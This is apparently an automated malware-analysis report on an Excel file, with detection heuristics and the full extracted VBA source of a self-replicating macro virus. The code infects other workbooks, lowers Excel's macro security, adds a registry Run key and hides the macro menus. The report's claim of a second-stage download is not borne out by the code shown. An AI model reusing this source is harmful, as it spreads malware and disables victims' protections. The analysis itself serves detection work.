MALICIOUS
328
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample is an Excel file containing VBA macros that execute upon opening. The Workbook_Open subroutine attempts to create a VBScript file named 'yinyin3345.vbs' in the Excel startup path and potentially save a workbook as an add-in named 'yinyin3345.xls'. The script also contains logic for self-replication and AV tampering. This indicates an attempt to download and execute a second-stage payload and establish persistence.
Heuristics 8
-
ClamAV: Xls.Trojan.Yini-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Yini-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set WshShell = CreateObject("WScript.Shell") -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Target.DeleteLines 1, Source.CountOfLines -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fso = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6592 bytes |
SHA-256: a21d43761fc3bce9b061cdf8eaf77070a22f1cac3c7bfc8f23a0cd24a7f2464d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Private Const Darling As String = "yinyin3345.xls"
Private Const StartLove As String = "yinyin3345.vbs"
Private Const MYTEXT As String = "c:\windows\system\HappyBirthday"
Private Sub Workbook_Open()
Dim DarlingPath As String
Dim StartPath As String
Dim DarlingBook As Workbook
Dim Fullpath As String
Dim ExistFlag
On Error Resume Next
Call Hide
Call CreateFile
StartPath = Application.StartupPath
Fullpath = UCase$(StartPath + "\" + Darling)
ExistFlag = Len(Dir$(Fullpath))
If UCase$(Me.FullName) = Fullpath Then
Set App = Application
ElseIf (ExistFlag = 0) Then
Application.ScreenUpdating = False
If Len(Dir(StartPath, vbDirectory)) = 0 Then
MkDir StartPath
End If
Set DarlingBook = Application.Workbooks.Add
DarlingBook.IsAddin = True
HurtWbk DarlingBook
'DarlingBook.SaveAs Fullpath, xlNormal
DarlingBook.SaveAs Fullpath, xlAddIn
DarlingBook.Close
Application.ScreenUpdating = True
Else
End If
End Sub
Private Sub App_WorkbookBeforeSave(ByVal Wbk As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
On Error Resume Next
HurtWbk Wbk
End Sub
Private Sub App_WorkbookBeforeClose(ByVal Wbk As Excel.Workbook, Cancel As Boolean)
On Error Resume Next
If Len(Wbk.Path) <> 0 Then
If HurtWbk(Wbk) Then
Wbk.Save
Wbk.Saved = True
End If
End If
End Sub
Private Function HurtWbk(Wbk As Workbook) As Boolean
Dim Source As Object
Dim Target As Object
Dim FindResult As Boolean
On Error Resume Next
HurtWbk = False
Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
Set Target = Wbk.VBProject.VBComponents("ThisWorkbook").CodeModule
FindResult = Wbk.VBProject.VBComponents("ThisWorkBook").CodeModule.Find("yinyin3345.xls", 1, 1, 10, 30, False, False) '查看目标文件是否已带毒
If FindResult = False Then
Target.DeleteLines 1, Source.CountOfLines
Target.AddFromString Source.Lines(1, Source.CountOfLines)
End If
End Function
Sub Hide()
Dim Con
Dim WshShell
Dim Fullpath As String
Dim Fso
Dim File
Set Fso = CreateObject("scripting.filesystemobject")
Set WshShell = CreateObject("WScript.Shell")
On Error Resume Next
For Each File In Application.RecentFiles
If InStr(File.Name, "yinyin3345.xls") > 0 Then
Fso.deletefile File.Path
End If
Next File
On Error Resume Next
Fullpath = WshShell.SpecialFolders("recent") & "\yinyin~1.lnk"
If Len(Dir$(Fullpath)) > 0 Then
Fso.deletefile Fullpath
End If
Fullpath = WshShell.SpecialFolders("Templates") & "\Software\yinyin3345.vbs"
WshShell.regwrite "HKCU\Software\Microsoft\Office\9.0\excel\Security\Level", 1, "REG_DWORD"
WshShell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\internet.exe", Fullpath
On Error Resume Next
For Each Con In Application.CommandBars("tools").Controls
If Left$(Con.Caption, 1) = "宏" Then
Con.Enabled = False
Exit For
End If
Next Con
On Error Resume Next
For Each Con In Application.CommandBars("macro").Controls
Con.Enabled = False
Con.Visible = False
Next Con
End Sub
Sub CreateFile()
Dim Fso, Source
Dim Wsh
Dim Myfolder
Dim FileName, i, Text
Set Fso = CreateObject("scripting.filesystemobject")
Set Wsh = CreateObject("wscript.shell")
Myfolder = Wsh.SpecialFolders("Templates") & "\Software\"
Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
If Not Fso.folderexists(Myfolder) Then
Fso.createfolder Myfolder
End If
FileName = Myfolder & StartLove
Open FileName For Output As #1
Print #1, "Dim Fso,Wsh,Cell,myBook,MyText"
Print #1, "Set Fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"; Chr(34); ")"
Print #1, "Set wsh = CreateObject(" & Chr(34) & "wscript.shell"; Chr(34); ")"
Print #1, "Set cell = CreateObject(" & Chr(34) & "excel.application" & Chr(34) & ")"
Print #1, "if Fso.fileexists(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & ") = false then"
Print #1, "Set Mybook = cell.Workbooks.Add"
Print #1, "Mybook.IsAddin = True"
Print #1, "Mybook.VBProject.VBComponents(" & Chr(34) & "ThisWorkbook" & Chr(34) & ").CodeModule.addfromfile " & Chr(34) & "c:\windows\system\happybirthday" & Chr(34)
Print #1, "Mybook.SaveAs UCase(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & "), 18"
Print #1, "Mybook.Close"
Print #1, "Set cell = Nothing"
Print #1, "end if"
Print #1, "If Month(Date) = 11 And Day(Date) = 4 Then"
Print #1, "MsgBox " & Chr(34) & "祝MS.YINYIN3345小姐和MR.myfrien4061生日快乐!!!!!!!!" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") & " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
Print #1, "elseif weekday(date)= 5 then"
Print #1, "MsgBox " & Chr(34) & "您的电脑如果出现不能上网的问题,请和系统管理员联系。" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") & " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
Print #1, "else"
Print #1, "end if"
Print #1, "set fso = nothing"
Print #1, "set wsh = nothing"
Close #1
Open MYTEXT For Output As #1
Print #1, Source.Lines(1, Source.CountOfLines)
Close #1
Set Source = Nothing
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.